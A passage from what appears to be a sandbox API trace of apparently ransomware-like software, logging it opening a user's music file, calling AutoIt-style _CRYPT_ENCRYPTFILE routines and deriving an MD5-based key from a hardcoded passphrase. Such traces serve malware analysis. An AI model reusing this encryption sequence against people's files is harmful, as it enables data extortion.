"c:\\users\\fd1hvy\\music\\tg2o\\kxifnfq_et6k4yywd.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0117.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0117.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0117.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0117.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0117.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0117.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0117.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0117.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0117.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0117.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0117.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d8c0 [0117.896] FreeLibrary (hLibModule=0x772d0000) returned 1 [0117.896] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0117.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0117.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0117.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0117.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca340 [0117.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca340, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0117.897] CloseHandle (hObject=0x298) returned 1 [0117.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0117.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0117.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0117.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0117.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0117.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0117.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0117.897] FreeLibrary (hLibModule=0x772d0000) returned 1 [0117.897] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0117.897] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\KxIfNFq_eT6K4Yywd.m4a", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fdfec0, ftCreationTime.dwHighDateTime=0x1d5e49e, ftLastAccessTime.dwLowDateTime=0x978232c0, ftLastAccessTime.dwHighDateTime=0x1d5ea3b, ftLastWriteTime.dwLowDateTime=0x978232c0, ftLastWriteTime.dwHighDateTime=0x1d5ea3b, nFileSizeHigh=0x0, nFileSizeLow=0x747e, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="KxIfNFq_eT6K4Yywd.m4a", cAlternateFileName="KXIFNF~1.M4A")) returned 0x41ac500 [0117.897] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0117.898] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0117.898] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.898] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0117.898] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.898] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0117.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0117.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0117.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0117.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0117.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0117.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0117.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15) returned 0x1796e08 [0117.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0117.898] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0117.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0117.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0117.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0117.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0117.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0117.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0117.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0117.899] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0117.899] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0117.899] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0117.899] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0117.899] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.899] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0117.907] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.907] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0117.907] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0117.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0117.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0117.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0117.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0117.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca9d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0117.908] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0117.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0117.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0117.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0117.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0117.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0117.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0117.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0117.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0117.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e28a8 [0117.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0117.908] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0117.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0117.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0117.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0117.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0117.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0117.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0117.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0117.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0117.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0117.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0117.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2bd8 [0117.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0117.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0117.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0117.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0117.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0117.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0117.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0117.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0117.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0117.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0117.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0117.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0117.909] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0117.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0117.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0117.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0117.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0117.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0117.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0117.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0117.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0117.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2668 [0117.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2848 [0117.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0117.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0117.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e28a8 [0117.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0117.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0117.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0117.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0117.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0117.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2ae8 [0117.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0117.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0117.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0117.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0117.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0117.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0117.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0117.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.911] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0117.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0117.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0117.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0117.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0117.911] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0117.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0117.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0117.911] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0117.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0117.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0117.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0117.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0117.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0117.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0117.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0117.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0117.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0117.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0117.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0117.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0117.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0117.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0117.913] HeapFree (in: 